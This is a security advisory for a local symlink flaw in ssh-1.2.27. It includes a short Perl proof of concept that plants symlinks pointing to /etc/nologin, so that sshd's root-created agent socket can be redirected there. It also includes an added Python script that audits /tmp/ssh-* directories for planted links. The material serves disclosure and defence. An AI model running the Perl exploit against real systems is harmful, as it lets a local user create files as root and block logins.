ssh-1.2.27 local overflow

Published: 2000-05-16
Updated: 2000-05-16
Severity: High
Threat level: Local administrator privileges
Bug type: Design error
Exploitation mode: Server mode

Affected systems
ssh-1.2.27

Detailed description
On some systems, a local user can make ssh-1.2.27 create a UNIX domain socket with an arbitrary file name anywhere in the file system.

Test code

#!/usr/bin/perl
#
# vulnerable: SSH 1.2.27
#
# A vulnerability in SSH's creation of the authentication
# agent UNIX domain socket allows local users to create a
# UNIX domain socket with an arbitrary file name in the
# system.
#
# SSH has the concept of authentication proxying via the
# SSH authentication agent. It allows for a basic kind of
# Single Sign-On capability. The sshd daemon, ssh and ssh
# -agent communicate via a UNIX domain socket normally of
# the form '/tmp/ssh-<username>/agent-socket-<pid>'.
#
# SSH follows symbolic links while creating the socket as
# root thus allowing any local users with ssh access to
# create a socket with an arbitrary filename in the
# system.
#
# Notice that this will not work under all operating
# systems. Some operating systems do not follow symbolic
# links during bind on UNIX domain sockets. Linux 2.0.x,
# Solaris 2.5.1 and IRIX 6.5.2 do not follow symbolic
# links during bind(2). Linux 2.1.x does.

$pid = $$;
$whoami = `whoami`;
chop($whoami);
mkdir("/tmp/ssh-$whoami", 0700);
for ($i = $pid; $i < $pid+50; $i++) {
    symlink("/etc/nologin", "/tmp/ssh-$whoami/ssh-$i-agent");
}

Solution
None yet

Related information
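The precondition for the problem above is a symlink planted inside a /tmp/ssh-<user> directory before sshd creates its agent socket there. The following audit script is an added example, not part of the advisory or of the SSH distribution: it lists every symlink found under such directories (the directory itself counts too) so an administrator can spot planted links on a host that still runs an affected version. The directory name "ssh-alice" and the socket names in the demo are constructed values.

```python
"""Audit ssh agent-socket directories for planted symlinks.

Added example (not from the advisory). sshd 1.2.27 creates
/tmp/ssh-<user>/agent-socket-<pid> as root and, on kernels whose
bind(2) follows symlinks, a pre-planted link in that directory
redirects the socket creation. This audit reports such links.
"""
import os
import socket
import tempfile


def audit_agent_dirs(base="/tmp"):
    """Return (path, target) for every symlink in base/ssh-*/ directories.

    A symlink in place of the ssh-* directory itself is reported as well,
    since the daemon would follow it just the same.
    """
    findings = []
    for name in sorted(os.listdir(base)):
        if not name.startswith("ssh-"):
            continue
        d = os.path.join(base, name)
        if os.path.islink(d):
            findings.append((d, os.readlink(d)))
            continue
        if not os.path.isdir(d):
            continue
        for entry in sorted(os.listdir(d)):
            p = os.path.join(d, entry)
            if os.path.islink(p):          # lstat-based: never follows the link
                findings.append((p, os.readlink(p)))
    return findings


def run_demo():
    """Constructed scenario in a throwaway directory: one genuine agent
    socket (bound by this process) and one planted symlink beside it."""
    base = tempfile.mkdtemp()
    d = os.path.join(base, "ssh-alice")
    os.mkdir(d, 0o700)
    s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    s.bind(os.path.join(d, "agent-socket-1234"))  # real socket: not reported
    os.symlink("/etc/nologin", os.path.join(d, "agent-socket-1235"))
    findings = audit_agent_dirs(base)
    s.close()
    return findings


if __name__ == "__main__":
    for path, target in audit_agent_dirs():
        print(f"symlink {path} -> {target}")
```

Run without arguments it scans the real /tmp; run_demo() exercises the logic against the constructed scenario and returns the single planted link.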